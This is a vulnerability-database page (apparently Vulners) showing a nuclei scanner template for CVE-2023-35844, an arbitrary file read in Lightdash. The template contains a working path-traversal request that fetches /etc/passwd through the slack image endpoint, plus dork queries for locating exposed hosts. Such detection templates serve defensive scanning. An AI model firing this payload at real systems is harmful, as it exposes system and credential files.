Lucene search

K

Lightdash version <= 0.510.3 Arbitrary File Read

🗓️ 19 Jun 2023 19:05:23Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Lightdash version <= 0.510.3 Arbitrary File Read. Insecure file endpoints allowing directory traversal without file extension validation leading to unauthorized access to sensitive information

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Vulnrichment
CVE-2023-35844
19 Jun 202300:00
vulnrichment
CVE
CVE-2023-35844
19 Jun 202302:15
cve
Cvelist
CVE-2023-35844
19 Jun 202300:00
cvelist
Prion
Directory traversal
19 Jun 202302:15
prion
NVD
CVE-2023-35844
19 Jun 202302:15
nvd
GithubExploit
Exploit for Path Traversal in Lightdash
26 Jun 202310:14
githubexploit
OSV
CVE-2023-35844
19 Jun 202302:15
osv
id: CVE-2023-35844

info:
  name: Lightdash version <= 0.510.3 Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: |
    packages/backend/src/routers in Lightdash before 0.510.3
    has insecure file endpoints, e.g., they allow .. directory
    traversal and do not ensure that an intended file extension
    (.csv or .png) is used.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data.
  remediation: |
    Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability.
  reference:
    - https://advisory.dw1.io/59
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35844
    - https://github.com/lightdash/lightdash/commit/fcc808c84c2cc3afb343063e32a49440d32a553c
    - https://github.com/lightdash/lightdash/compare/0.510.2...0.510.3
    - https://github.com/lightdash/lightdash/pull/5090
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-35844
    cwe-id: CWE-22
    epss-score: 0.04986
    epss-percentile: 0.92655
    cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lightdash
    product: lightdash
    shodan-query:
      - title:"Lightdash"
      - http.title:"lightdash"
    fofa-query: title="lightdash"
    google-query: intitle:"lightdash"
  tags: cve,cve2023,lightdash,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022012da6f99398ebc7af34bea9c90c8fa524415897bb2d909cc45276e17d4a25215022100f6de7c6fc2ed22612ad208af449fe9fef9c333512dd3ba30bf0c13e610a60868:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
19 Jun 2023 19:23Current
7.5High risk
Vulners AI Score7.5
CVSS37.5
EPSS0.25651
SSVC
12
.json
Report